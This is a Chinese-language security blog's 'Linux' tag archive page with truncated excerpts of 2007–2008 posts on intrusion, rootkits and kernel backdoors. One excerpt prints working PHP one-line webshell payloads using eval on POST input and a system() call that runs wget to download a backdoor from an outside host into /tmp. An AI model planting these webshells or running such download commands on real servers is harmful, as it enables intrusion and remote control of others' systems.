标签 ‘Linux’ 下的日志

利用X-window配置错误入侵Linux

2008/02/21 11:45 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔注:本来是PDF的,我给转换了下,更方便看,文章末尾有PDF原版的下载地址。

来源:Information Security Technology Organization

Author:Mickey
MSN:54mickey _At_ Gmail.com

常见的漏洞分为软件漏洞和配置漏洞,软件漏洞的挖掘需要扎实的编程功底和对操作系统原理的深入理解;
配置漏洞通常是由于管理员的自身知识的不足造成的。在 Linux 环境下,X Window 是用来显示图形界面应用程序的底层系统,X Window 服务的认证通常分为 xhost 和 xauth 认证,xhost 认证的配置方法比较简便,只需在 xhost 命令后使用+或-选项来分别表示允许或拒绝某个主机访问本地的 X 阅读全文 »

Tags:

LINUX下写入一句话木马的方法整理

2008/01/30 4:55 | 鬼仔 | 技术文章 | 消灭0回复

文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。

LINUX下写入一句话木马的方法整理:
(1)echo '<?eval($cmd);?>' > /home/web/www/PREFIX/htdocs/mu.php
(2)echo "<?fputs(fopen('1.php','w+'),'<?eval($_POST[c]);?>');?>" >test11.php
(3)"system('wget http://xxxxxx.com/backdoor -P /tmp')"
阅读全文 »

Tags:

Linux平台socks5代理

2008/01/25 7:12 | 鬼仔 | 工具收集 | 消灭0回复

by 云舒
2008-1-25
http://www.ph4nt0m.org

前几天MSN老上不去,我还以为是公司做了防火墙限制。于是把去年这个时候写得一个代理程序改了改,拿出来用。结果发现MSN是因为微软的问题,鄙视啊……
因为写得比较急,这个只支持TCP代理,UDP的我没写,因为MSN用不上。这个代码可以随意修改分发,不过最好能给我一份。

这是头文件:
阅读全文 »

Tags: ,

Linux2.6内核进程创建过程分析

2007/10/24 10:16 | 鬼仔 | 技术文章 | 消灭0回复

来源:安全焦点

/*Kernel version: linux-2.6.22.9
*作者:旋木木
*日期:2007/10/17
*E-mail:[email protected]
*/
Fork的系统调用代码在linux/arch/i386/kernel/process.c中:
asmlinkage int sys_fork(struct pt_regs regs)
{
return do_fork(SIGCHLD, regs.esp, &regs, 0, NULL, NULL);
}
Sys_fork系统调用通过 do_fork()函数实现,通过对do_fork()函数传递不同的clone_flags来实现fork,clone,vfork。
Syn_clone和syn_vfork的系统调用代码如下:
asmlinkage 阅读全文 »

Tags:

一个简单的内核后门原型

2007/10/24 3:18 | 鬼仔 | 工具收集 | 消灭0回复

作者:wzt <wzt#xsec.org>

这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵

阅读全文 »

Tags:

linux下mysql 5.x得到root密码后的另外一种利用方式

2007/09/27 2:06 | 鬼仔 | 技术文章 | 1 个回复

来源:P3r1li5h's blog

刚才在卫生间蹲着的时候突然想到这个问题,mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。

mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。

一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。

按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找, 阅读全文 »

Tags: ,

Linux后门系列–由浅入深sk13完全分析(缩水版)

2007/09/12 9:47 | 鬼仔 | 技术文章 | 消灭0回复

作者 wzt
联系方式 [email protected]
个人网站 http://tthacker.cublog.cn http://xsec.org

本文首发《黑客防线》第八期,本文在《黑防》里有更详细更细致的描述,特别适合刚入门的小嘿嘿,因为网上发布的这个文章省略了不少术语的解释,不熟悉这个领域的朋友看起来感觉会比较迷茫,另外本人将陆续往《黑客防线》投稿《Linux后门系列》文章,有兴趣的朋友可以关注一下。

一、简介
二、sk的特色功能
三、sk13的安装使用
四、install.c执行流程
五、install代码完全解析
六、总结
七、参考
八、WNPS简介
九、感谢

一.简介.

我们经常可以从一些搞linux入侵的朋友那里听到他们讨论sk这个rootkit,其实sk的全称是suckit,意为super 阅读全文 »

Tags:

Linux sniffdoor v 1.0

2007/06/17 11:01 | 鬼仔 | 工具收集 | 1 个回复

软件作者:wzt <[email protected]>
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:文章首发www.XSec.org,后由原创作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。

SniffDoor V 1.0 (c) 2007 by wzt <[email protected]>
+————————————————–+

Sniffdoor is a linux backdoor woke up with a special
tcp packet.It can bind a shell with tty,it can send
files with 阅读全文 »

Tags: ,